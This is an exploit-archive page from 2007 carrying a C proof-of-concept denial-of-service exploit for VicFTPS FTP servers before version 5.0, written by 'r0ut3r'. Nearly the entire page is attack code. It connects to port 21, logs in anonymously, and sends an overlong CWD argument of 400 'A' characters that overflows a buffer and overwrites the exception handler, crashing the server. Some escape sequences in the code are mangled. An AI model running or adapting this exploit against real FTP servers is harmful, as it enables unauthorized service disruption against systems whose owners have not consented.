VicFTPS < 5.0 (CWD) Remote Buffer Overflow Exploit PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : VicFTPS < 5.0 (CWD) Remote Buffer Overflow Exploit PoC
# Published : 2007-02-18
# Author : r0ut3r
# Previous Title : FTP Explorer 1.0.1 Build 047 (CPU consumption) Remote DoS Exploit
# Next Title : MailEnable Professional/Enterprise <= 2.35 Out of Bounds DoS Exploit

/*
VicFTPs Server CWD Remote Buffer Overflow Vulnerability
                 DoS Proof of concept

            r0ut3r (writ3r [at] gmail.com)

Thanks to:
Marsu (Marsupilamipowa [at] hotmail.fr)
for helping me out with this vulnerability.

Greets Marsu, and Timq.

Description:
Sending a long argument to CWD will cause VicFTPs Server
to overwrite memory. EIP is overwritten at 323. The POC
uses a larger buffer to overwrite exception handler,
preventing an error message.  
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 21

int s;
struct sockaddr_in sock_addr;

char recvbuf[1024];
char pwn[450];

int main(int argc, char* argv[])
{
      if (argc < 2) {
        printf("Usage: %s <ip>n", argv[0]);
        return 1; }

      if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        printf("error with socketn");
        return 1; }

      sock_addr.sin_family = AF_INET;
      sock_addr.sin_addr.s_addr = inet_addr(argv[1]);
      sock_addr.sin_port = htons(PORT);

      if (connect(s, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
        printf("unable to connectn");
        return 1; }

      printf("[+] Connectedn");
      memset(recvbuf, '', 1024);
      recv(s, recvbuf, 1024, 0);

      char userbuf[50];
      printf("[+] Sending user...n");
      memset(userbuf, '', 50);
      memcpy(userbuf, "USER anonymousrn", 18);
      if (send(s, userbuf, strlen(userbuf), 0) == -1) {
        printf("unable to send datan");
        return 1; }

      memset(recvbuf, '', 1024);
      recv(s, recvbuf, 1024, 0);

      char passbuf[50];
        printf("[+] Sending pass...n");
        memcpy(passbuf, "PASS anonymousrn", 18);
        if (send(s, passbuf, strlen(passbuf), 0) == -1) {
                printf("unable to send datan");
                return 1; }
      recv(s, recvbuf, 1024, 0);

      printf("[+] Building payload. n");
      memset(pwn, '', 450);
      memcpy(pwn, "CWD ", 4);
      memset(pwn+4, 'A', 400);
      memcpy(pwn+404, "rn", 2);

      printf("[+] Sending payload.n");
      if (send(s, pwn, strlen(pwn), 0) == -1) {
        printf("unable to send datan");
        return 1; }

      printf("[!] Boom! crashed?!n");

      return 0;
}

// www.Syue.com [2007-02-18]